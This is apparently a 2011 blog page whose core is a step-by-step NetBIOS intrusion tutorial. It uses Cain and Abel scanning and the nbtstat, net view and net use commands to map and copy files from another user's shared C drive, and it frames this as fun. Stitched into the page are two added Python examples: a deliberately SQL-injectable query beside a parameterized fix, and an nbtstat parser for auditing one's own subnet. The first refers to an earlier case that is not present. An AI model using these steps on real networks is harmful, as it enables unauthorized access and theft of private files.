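The address-bar case above, as an added example that is not part of the original post: a lookup that pastes the id parameter straight into the query (the mistake behind the vulnerable index.asp?id= pattern) beside a version that checks the type and binds the value as a parameter. It assumes an in-memory SQLite table with constructed sample articles; the ASP site in the text would use a different database, but the two query styles behave the same way.

```python
import sqlite3

# Constructed sample articles standing in for the site's table (not from the original page).
SAMPLE_ARTICLES = [(10, "Article ten"), (11, "Article eleven"), (12, "Article twelve")]


def make_db():
    """In-memory SQLite database loaded with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany("INSERT INTO articles VALUES (?, ?)", SAMPLE_ARTICLES)
    return conn


def build_vulnerable_sql(raw_id):
    """The mistake behind index.asp?id=...: the URL value is pasted straight into the SQL text."""
    return "SELECT id, title FROM articles WHERE id=" + raw_id


def lookup_vulnerable(conn, raw_id):
    """Executes the concatenated query, so '10 AND id=11' becomes part of the WHERE clause."""
    return conn.execute(build_vulnerable_sql(raw_id)).fetchall()


def lookup_safe(conn, raw_id):
    """Hardened form: enforce the expected type, then bind the value as a parameter.

    int() raises ValueError for anything that is not a plain integer, so the tail
    of a tampered URL never reaches the database as SQL.
    """
    article_id = int(raw_id)
    return conn.execute(
        "SELECT id, title FROM articles WHERE id=?", (article_id,)
    ).fetchall()


def compare(raw_id):
    """Run both lookups on the same URL parameter and report what each did."""
    conn = make_db()
    report = {
        "sql_run_by_vulnerable": build_vulnerable_sql(raw_id),
        "vulnerable_rows": lookup_vulnerable(conn, raw_id),
    }
    try:
        report["safe_rows"] = lookup_safe(conn, raw_id)
        report["safe_rejected"] = False
    except ValueError:
        report["safe_rows"] = []
        report["safe_rejected"] = True
    return report


if __name__ == "__main__":
    for param in ("10", "10 AND id=11"):  # a normal request, then the tutorial's test string
        print(param, "->", compare(param))
```

The tell on the vulnerable path is that the row set changes once the tail of the URL is executed as SQL, while the hardened lookup refuses the value before any query runs.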
Thursday, May 26, 2011
Wednesday, May 25, 2011
“Ethical Hacking” Case Studies
Download “Ethical Hacking” Case Studies from www.orsoc.org.uk
Click Here to Download the presentation
Download Major Hacking Case Studies from www.isaca.org.hk
Download Bluetooth Hacking Case Study from www.garykessler.net
Download Anti-Hacking Case Studies
Friday, May 6, 2011
NETBIOS HACKING
NETBIOS HACKING - BREAKING INTO SYSTEM
-What is it?-
NetBIOS Hacking is the art of hacking into someone else's computer through your computer. NetBIOS stands for "Network Basic Input Output System." It is a way for a LAN or WAN to share folders, files, drives, and printers.
-How can this be of use to me?-
Most people don't realize it, but when they're on a LAN or WAN they may have their entire hard drive shared without knowing. So if we can find a way into the network, their computer is at our disposal.
-What do I need?-
Windows OS
Cain and Abel - get it from here - http://www.oxid.it/
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Step 1, Finding the target.]-
++++++++++++++++++++++++++++++++++++++++++++++++++
So first off we need to find a computer, or the computer, to hack into. So if you're plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built-in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program, click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross.
Another window will pop up, make sure "All host in my subnet" is selected, and then click ok.
It should begin to scan.
Then IPs, computer names, and MAC addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can't tell whether the IP address is a computer, router, modem, etc, that's ok.
During the next step we will begin our trial and error.
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Part 2, Trial and Error]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Now, we don't know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let's get back to the hacking.
Type in "ping (IP address of the target)." For example in this tutorial, "ping 192.168.1.103."
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):
If it didn't work, meaning that the target is not online, it will look something like this:
If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Part 3, Gathering the Information.]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Now, input this command "nbtstat -a (IP address of target)." An example would be "nbtstat -a 192.168.1.103."
This will show us if there is file sharing enabled, and if there is, it will give us the currently logged on user, workgroup, and computer name.
Ok, you're probably wondering, "What does all this mean to me?" Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.
The information right below the original command says "Local Area Connection." This tells us about our connection through the LAN; in my case, I am not connected through the LAN, so the host is not found and there is no IP.
The information right below the "Local Area Connection," is "Wireless Network Connection 2:" It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.
The NetBIOS Remote Machine Name Table gives us the target computer's workgroup, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn't. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computer's workgroup, SUPERHEROES. If you are confused about which one is the workgroup and which is the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup.
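The name-table reading in Part 3, as an added example that is not part of the tutorial: a small parser for nbtstat -a output that pulls out the computer name, the workgroup and whether the <20> (file sharing) entry is registered, plus an audit helper that lists which hosts on your own subnet advertise shares. The two listings are constructed to match the tutorial's example, and the reading of a <03> UNIQUE entry as the logged-on user is the standard NetBIOS suffix meaning, not something the tutorial states.

```python
import re

# Constructed nbtstat -a listing modelled on the table the tutorial walks through
# (names and addresses are the tutorial's examples; the MAC is a placeholder).
SAMPLE_NBTSTAT = """
Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []
    Host not found.
Wireless Network Connection 2:
Node IpAddress: [192.168.1.103] Scope Id: []
           NetBIOS Remote Machine Name Table
       Name               Type         Status
    ---------------------------------------------
    BATGIRL        <00>  UNIQUE      Registered
    SUPERHEROES    <00>  GROUP       Registered
    BATGIRL        <20>  UNIQUE      Registered
    SUPERHEROES    <1E>  GROUP       Registered
    MAC Address = 00-00-00-00-00-00
"""

# A second constructed listing: a host with no <20> entry, i.e. no file sharing.
SAMPLE_NO_SHARE = """
Node IpAddress: [192.168.1.104] Scope Id: []
    PRINTER01      <00>  UNIQUE      Registered
    SUPERHEROES    <00>  GROUP       Registered
"""

ROW_RE = re.compile(r"^\s*(\S+)\s+<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\w+)", re.M)
IP_RE = re.compile(r"Node IpAddress:\s*\[(\d+\.\d+\.\d+\.\d+)\]")


def summarize(text):
    """Read one listing the tutorial's way: <00> UNIQUE = computer name,
    <00> GROUP = workgroup, <20> UNIQUE = file sharing (Server service) registered,
    and a <03> UNIQUE entry other than the computer name = logged-on user."""
    ips = [ip for ip in IP_RE.findall(text) if ip != "0.0.0.0"]
    info = {"ip": ips[0] if ips else None, "computer": None, "workgroup": None,
            "file_sharing": False, "logged_on_user": None}
    names_03 = []
    for name, suffix, kind, _status in ROW_RE.findall(text):
        suffix = suffix.upper()
        if suffix == "00" and kind == "UNIQUE":
            info["computer"] = name
        elif suffix == "00" and kind == "GROUP":
            info["workgroup"] = name
        elif suffix == "20" and kind == "UNIQUE":
            info["file_sharing"] = True
        elif suffix == "03" and kind == "UNIQUE":
            names_03.append(name)
    info["logged_on_user"] = next((n for n in names_03 if n != info["computer"]), None)
    return info


def audit(listings):
    """For a defender reviewing their own subnet: which hosts advertise file sharing?"""
    return [s for s in map(summarize, listings) if s["file_sharing"]]


if __name__ == "__main__":
    for host in audit([SAMPLE_NBTSTAT, SAMPLE_NO_SHARE]):
        print(host)
```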
++++++++++++++++++++++++++++++++++++++++++++++++++
-[Step 4, Breaking In]-
++++++++++++++++++++++++++++++++++++++++++++++++++
Finally it's time.
By now we know: that our target is online, our target has file sharing, and our target's computer name.
So it's time to break in.
We will now locate the shared drives, folders, files, or printers. Type in "net view \\(IP Address of Target)"
An example for this tutorial would be: "net view \\192.168.1.103"
We have just found our share name. In this case, under the share name is "C," meaning that the only shared thing on the computer is C. Then to the right, under Type, it says "Disk." This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person's hard drive.
All that is left to do is "map" the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the target's computer can be accessed through our created network drive. Type in "net use K: \\(IP Address of Target)\(Shared Drive)". For my example in this tutorial, "net use K: \\192.168.1.103\C." Ok, let's say that you plan on doing this again to a different person; do you see the "K" after "net use"? This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be "net use G...," for a different target.
As you can see, for my hack I have already used "K," so I used "G" instead.
You may also do the same for multiple hacks.
If it worked, it will say "The command completed successfully."
If not, you will have to go retrace your steps.
Now open up "my computer" under the start menu, and your newly created network drive should be there.
Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won't be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer, because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!